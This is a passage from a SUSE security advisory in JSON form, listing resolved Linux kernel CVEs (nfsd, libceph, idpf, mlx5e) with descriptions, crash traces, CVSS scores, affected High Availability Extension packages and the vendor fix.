"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22988"
},
{
"cve": "CVE-2026-22989",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22989"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: check that server is running in unlock_filesystem\n\nIf we are trying to unlock the filesystem via an administrative\ninterface and nfsd isn\u0027t running, it crashes the server. This\nhappens currently because nfsd4_revoke_states() access state\nstructures (eg., conf_id_hashtbl) that has been freed as a part\nof the server shutdown.\n\n[ 59.465072] Call trace:\n[ 59.465308] nfsd4_revoke_states+0x1b4/0x898 [nfsd] (P)\n[ 59.465830] write_unlock_fs+0x258/0x440 [nfsd]\n[ 59.466278] nfsctl_transaction_write+0xb0/0x120 [nfsd]\n[ 59.466780] vfs_write+0x1f0/0x938\n[ 59.467088] ksys_write+0xfc/0x1f8\n[ 59.467395] __arm64_sys_write+0x74/0xb8\n[ 59.467746] invoke_syscall.constprop.0+0xdc/0x1e8\n[ 59.468177] do_el0_svc+0x154/0x1d8\n[ 59.468489] el0_svc+0x40/0xe0\n[ 59.468767] el0t_64_sync_handler+0xa0/0xe8\n[ 59.469138] el0t_64_sync+0x1ac/0x1b0\n\nEnsure this can\u0027t happen by taking the nfsd_mutex and checking that\nthe server is still up, and then holding the mutex across the call to\nnfsd4_revoke_states().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22989",
"url": "https://www.suse.com/security/cve/CVE-2026-22989"
},
{
"category": "external",
"summary": "SUSE Bug 1257279 for CVE-2026-22989",
"url": "https://bugzilla.suse.com/1257279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22989"
},
{
"cve": "CVE-2026-22990",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22990"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: replace overzealous BUG_ON in osdmap_apply_incremental()\n\nIf the osdmap is (maliciously) corrupted such that the incremental\nosdmap epoch is different from what is expected, there is no need to\nBUG. Instead, just declare the incremental osdmap to be invalid.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22990",
"url": "https://www.suse.com/security/cve/CVE-2026-22990"
},
{
"category": "external",
"summary": "SUSE Bug 1257221 for CVE-2026-22990",
"url": "https://bugzilla.suse.com/1257221"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22990"
},
{
"cve": "CVE-2026-22991",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22991"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make free_choose_arg_map() resilient to partial allocation\n\nfree_choose_arg_map() may dereference a NULL pointer if its caller fails\nafter a partial allocation.\n\nFor example, in decode_choose_args(), if allocation of arg_map-\u003eargs\nfails, execution jumps to the fail label and free_choose_arg_map() is\ncalled. Since arg_map-\u003esize is updated to a non-zero value before memory\nallocation, free_choose_arg_map() will iterate over arg_map-\u003eargs and\ndereference a NULL pointer.\n\nTo prevent this potential NULL pointer dereference and make\nfree_choose_arg_map() more resilient, add checks for pointers before\niterating.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22991",
"url": "https://www.suse.com/security/cve/CVE-2026-22991"
},
{
"category": "external",
"summary": "SUSE Bug 1257220 for CVE-2026-22991",
"url": "https://bugzilla.suse.com/1257220"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22991"
},
{
"cve": "CVE-2026-22992",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22992"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: return the handler error from mon_handle_auth_done()\n\nCurrently any error from ceph_auth_handle_reply_done() is propagated\nvia finish_auth() but isn\u0027t returned from mon_handle_auth_done(). This\nresults in higher layers learning that (despite the monitor considering\nus to be successfully authenticated) something went wrong in the\nauthentication phase and reacting accordingly, but msgr2 still trying\nto proceed with establishing the session in the background. In the\ncase of secure mode this can trigger a WARN in setup_crypto() and later\nlead to a NULL pointer dereference inside of prepare_auth_signature().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22992",
"url": "https://www.suse.com/security/cve/CVE-2026-22992"
},
{
"category": "external",
"summary": "SUSE Bug 1257218 for CVE-2026-22992",
"url": "https://bugzilla.suse.com/1257218"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22992"
},
{
"cve": "CVE-2026-22993",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22993"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL ptr issue after soft reset\n\nDuring soft reset, the RSS LUT is freed and not restored unless the\ninterface is up. If an ethtool command that accesses the rss lut is\nattempted immediately after reset, it will result in NULL ptr\ndereference. Also, there is no need to reset the rss lut if the soft reset\ndoes not involve queue count change.\n\nAfter soft reset, set the RSS LUT to default values based on the updated\nqueue count only if the reset was a result of a queue count change and\nthe LUT was not configured by the user. In all other cases, don\u0027t touch\nthe LUT.\n\nSteps to reproduce:\n\n** Bring the interface down (if up)\nifconfig eth1 down\n\n** update the queue count (eg., 27-\u003e20)\nethtool -L eth1 combined 20\n\n** display the RSS LUT\nethtool -x eth1\n\n[82375.558338] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[82375.558373] #PF: supervisor read access in kernel mode\n[82375.558391] #PF: error_code(0x0000) - not-present page\n[82375.558408] PGD 0 P4D 0\n[82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf]\n[82375.558786] Call Trace:\n[82375.558793] \u003cTASK\u003e\n[82375.558804] rss_prepare.isra.0+0x187/0x2a0\n[82375.558827] rss_prepare_data+0x3a/0x50\n[82375.558845] ethnl_default_doit+0x13d/0x3e0\n[82375.558863] genl_family_rcv_msg_doit+0x11f/0x180\n[82375.558886] genl_rcv_msg+0x1ad/0x2b0\n[82375.558902] ? __pfx_ethnl_default_doit+0x10/0x10\n[82375.558920] ? __pfx_genl_rcv_msg+0x10/0x10\n[82375.558937] netlink_rcv_skb+0x58/0x100\n[82375.558957] genl_rcv+0x2c/0x50\n[82375.558971] netlink_unicast+0x289/0x3e0\n[82375.558988] netlink_sendmsg+0x215/0x440\n[82375.559005] __sys_sendto+0x234/0x240\n[82375.559555] __x64_sys_sendto+0x28/0x30\n[82375.560068] x64_sys_call+0x1909/0x1da0\n[82375.560576] do_syscall_64+0x7a/0xfa0\n[82375.561076] ? clear_bhb_loop+0x60/0xb0\n[82375.561567] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22993",
"url": "https://www.suse.com/security/cve/CVE-2026-22993"
},
{
"category": "external",
"summary": "SUSE Bug 1257180 for CVE-2026-22993",
"url": "https://bugzilla.suse.com/1257180"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22993"
},
{
"cve": "CVE-2026-22996",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22996"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv\n\nmlx5e_priv is an unstable structure that can be memset(0) if profile\nattaching fails, mlx5e_priv in mlx5e_dev devlink private is used to\nreference the netdev and mdev associated with that struct. Instead,\nstore netdev directly into mlx5e_dev and get mdev from the containing\nmlx5_adev aux device structure.\n\nThis fixes a kernel oops in mlx5e_remove when switchdev mode fails due\nto change profile failure.\n\n$ devlink dev eswitch set pci/0000:00:03.0 mode switchdev\nError: mlx5_core: Failed setting eswitch to offloads.\ndmesg:\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n\n$ devlink dev reload pci/0000:00:03.0 ==\u003e oops\n\nBUG: kernel NULL pointer dereference, address: 0000000000000520\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 3 UID: 0 PID: 521 Comm: devlink Not tainted 6.18.0-rc5+ #117 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_remove+0x68/0x130\nRSP: 0018:ffffc900034838f0 EFLAGS: 00010246\nRAX: ffff88810283c380 RBX: ffff888101874400 RCX: ffffffff826ffc45\nRDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff888102d789c0 R08: ffff8881007137f0 R09: ffff888100264e10\nR10: ffffc90003483898 R11: ffffc900034838a0 R12: ffff888100d261a0\nR13: ffff888100d261a0 R14: ffff8881018749a0 R15: ffff888101874400\nFS: 00007f8565fea740(0000) GS:ffff88856a759000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000520 CR3: 000000010b11a004 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n device_release_driver_internal+0x19c/0x200\n bus_remove_device+0xc6/0x130\n device_del+0x160/0x3d0\n ? devl_param_driverinit_value_get+0x2d/0x90\n mlx5_detach_device+0x89/0xe0\n mlx5_unload_one_devl_locked+0x3a/0x70\n mlx5_devlink_reload_down+0xc8/0x220\n devlink_reload+0x7d/0x260\n devlink_nl_reload_doit+0x45b/0x5a0\n genl_family_rcv_msg_doit+0xe8/0x140",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22996",
"url": "https://www.suse.com/security/cve/CVE-2026-22996"
},
{
"category": "external",
"summary": "SUSE Bug 1257203 for CVE-2026-22996",
"url": "https://bugzilla.suse.com/1257203"
}
],
